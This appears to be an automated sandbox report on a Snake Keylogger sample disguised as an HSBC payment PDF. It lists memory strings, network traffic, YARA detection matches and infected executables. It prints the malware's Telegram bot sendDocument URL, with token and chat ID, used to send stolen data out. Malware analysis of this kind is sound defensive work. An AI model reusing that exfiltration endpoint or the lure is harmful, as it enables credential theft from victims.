Source: AppVClient.exe, 00000007.00000003.2109262975.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2109012837.00000000004D6000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2109493299.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000002.2110084231.00000000004F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.micrXX
Source: RegSvcs.exe, 00000011.00000002.3380159600.0000000003321000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/
Source: armsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTZ8fHx8fHw2NzU5NGNhZTNm
Source: armsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU5NGNiMGMw
Source: armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/L
Source: armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/T
Source: armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/d
Source: armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.0000000000982000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.0000000000984000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787409878.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2786700530.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690104496.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662
Source: armsvc.exe, 00000002.00000003.2288760056.0000000000982000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.0000000000984000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662ww99.przvgke.bizc
Source: armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787409878.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2786700530.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690104496.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334
Source: armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz/
Source: armsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555725636.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz/7Ycs
Source: armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz/iwsxa
Source: armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2329946680.000000000096D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.000000000096C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ww99.przvgke.biz/snsobwmcccpnrm
Source: Aut2exe_x64.exe.2.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/
Source: officesvcmgr.exe.2.dr | String found in binary or memory: http://www.openssl.org/support/faq.html
Source: officesvcmgr.exe.2.dr | String found in binary or memory: http://www.openssl.org/support/faq.htmlerror
Source: armsvc.exe, 00000002.00000003.2360231003.0000000002180000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.winimage.com/zLibDll
Source: RegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram
Source: RegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613
Source: armsvc.exe, 00000002.00000003.2776062257.00000000007C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: officesvcmgr.exe.2.dr | String found in binary or memory: https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaE
Source: armsvc.exe, 00000002.00000003.2400157057.0000000002180000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: armsvc.exe, 00000002.00000003.2401146251.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2400933791.0000000002180000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: armsvc.exe, 00000002.00000003.2776140964.00000000007C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: armsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2279735972.0000000002140000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.000000000096C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256234355.0000000002100000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
Source: msedge_proxy.exe.2.dr | String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
Source: msedge_proxy.exe.2.dr | String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
Source: armsvc.exe, 00000002.00000003.2776258063.00000000007C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                  Source: armsvc.exe, 00000002.00000003.2776258063.00000000007C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
                  Source: armsvc.exe, 00000002.00000003.2775829627.00000000007C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
                  Source: officesvcmgr.exe.2.drString found in binary or memory: https://nexusrules.officeapps.live.comhttps://nexus.officeapps.live.com/nexus/upload//nexus/rulesX-M
                  Source: officesvcmgr.exe.2.drString found in binary or memory: https://otelrules.azureedge.net/rules/UniversaliOSFailed
                  Source: armsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2279735972.0000000002140000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.000000000096C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256234355.0000000002100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
                  Source: armsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pcnatrk.net/track.
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175=4
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2
                  Source: officesvcmgr.exe.2.dr Binary or memory string: RegisterRawInputDevices

                  System Summary

                  Source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000000.2083883140.00000000004B4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000000.2083883140.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f47998d3-f
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0d40cd6b-0
                  Source: initial sampleStatic PE information: Filename: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 15_2_006C8140 SetFilePointerEx,_strlen,_strlen,_strlen,CloseHandle,OpenProcessToken,GetCurrentProcess,GetTokenInformation,GetLastError,WriteFile,ReadFile,SetFilePointerEx,GetEnvironmentVariableW,_wcslen,GetTempPathW,wsprintfW,GetTickCount,GetFileSizeEx,CreateFileW,CloseHandle,GetTickCount,RtlAdjustPrivilege,NtQuerySystemInformation,RtlInitUnicodeString,RtlEqualUnicodeString,NtOpenThread,NtImpersonateThread,NtOpenThreadTokenEx,NtAdjustPrivilegesToken,NtClose,NtClose,RtlExitUserThread,15_2_006C8140
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\aed9f0dd1e9bf5c4.bin
                  Source: C:\Windows\System32\wbengine.exe File created: C:\Windows\Logs\WindowsBackup
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Load Driver
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Security
                  Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
                  Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
                  Source: Acrobat.exe.2.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                  Source: SingleClientServicesUpdater.exe.2.drStatic PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
                  Source: msedgewebview2.exe.2.drStatic PE information: Number of sections : 14 > 10
                  Source: msedge_proxy.exe0.2.drStatic PE information: Number of sections : 12 > 10
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: Number of sections : 13 > 10
                  Source: pwahelper.exe0.2.drStatic PE information: Number of sections : 12 > 10
                  Source: identity_helper.exe.2.drStatic PE information: Number of sections : 12 > 10
                  Source: msedge_proxy.exe.2.drStatic PE information: Number of sections : 12 > 10
                  Source: elevation_service.exe.0.drStatic PE information: Number of sections : 12 > 10
                  Source: pwahelper.exe.2.drStatic PE information: Number of sections : 12 > 10
                  Source: ie_to_edge_stub.exe.2.drStatic PE information: Number of sections : 11 > 10
                  Source: notification_click_helper.exe.2.drStatic PE information: Number of sections : 13 > 10
                  Source: elevation_service.exe0.0.drStatic PE information: Number of sections : 12 > 10
                  Source: setup.exe.2.drStatic PE information: Number of sections : 13 > 10
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2086157727.0000000003ED0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2090821480.0000000003ED0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2111669308.0000000004140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                  Source: unknown Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msdtc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msiexec.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: PerceptionSimulationService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: perfhost.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Locator.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MsSense.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SensorDataService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: private_browsing.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: updater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateCore.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateOnDemand.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jabswitch.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java-rmi.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javacpl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Au3Info.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
